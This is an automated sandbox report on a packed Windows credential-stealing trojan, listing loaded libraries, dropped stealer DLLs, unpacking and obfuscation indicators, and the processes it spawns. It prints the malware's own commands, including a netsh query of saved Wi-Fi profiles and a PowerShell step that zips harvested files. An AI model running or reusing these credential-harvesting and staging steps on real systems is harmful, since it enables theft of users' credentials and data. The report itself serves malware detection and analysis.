Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6E2269A0 appears 34 times

Tries to load missing DLLs

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Uses 32bit PE files

Source: wIaKimJFke.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wIaKimJFke.exe	Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: wIaKimJFke.exe	Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
Source: explorgu.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: explorgu.exe.0.dr	Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@15/21@0/1

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

File created: C:\Users\user\AppData\Roaming\006700e5a2ab05

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Users\user\AppData\Local\Temp\00c07260dc

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main

Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: wIaKimJFke.exe

ReversingLabs: Detection: 71%

Source: wIaKimJFke.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File read: C:\Users\user\Desktop\wIaKimJFke.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wIaKimJFke.exe "C:\Users\user\Desktop\wIaKimJFke.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: wIaKimJFke.exe

Static file information: File size 1906688 > 1048576

Source: wIaKimJFke.exe

Static PE information: Raw size of qrqrzugw is bigger than: 0x100000 < 0x1a0400

Source:

Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Unpacked PE file: 0.2.wIaKimJFke.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Unpacked PE file: 1.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Unpacked PE file: 5.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: cred64[1].dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x14318c
Source: clip64.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: explorgu.exe.0.dr	Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: clip64[1].dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: wIaKimJFke.exe	Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: cred64.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x14318c

PE file contains sections with non-standard names

Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: .idata
Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: qrqrzugw
Source: wIaKimJFke.exe	Static PE information: section name: ajeqznom
Source: wIaKimJFke.exe	Static PE information: section name: .taggant
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: qrqrzugw
Source: explorgu.exe.0.dr	Static PE information: section name: ajeqznom
Source: explorgu.exe.0.dr	Static PE information: section name: .taggant
Source: cred64[1].dll.5.dr	Static PE information: section name: _RDATA
Source: cred64.dll.5.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_004FD2A1 push ecx; ret	0_2_004FD29F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E2269E6 push ecx; ret	10_2_6E2269F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B700942 push E95B63D0h; ret	11_2_00007FFD9B7009C9

Source: wIaKimJFke.exe	Static PE information: section name: entropy: 7.985573734729088
Source: wIaKimJFke.exe	Static PE information: section name: qrqrzugw entropy: 7.952553763382188
Source: explorgu.exe.0.dr	Static PE information: section name: entropy: 7.985573734729088
Source: explorgu.exe.0.dr	Static PE information: section name: qrqrzugw entropy: 7.952553763382188

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
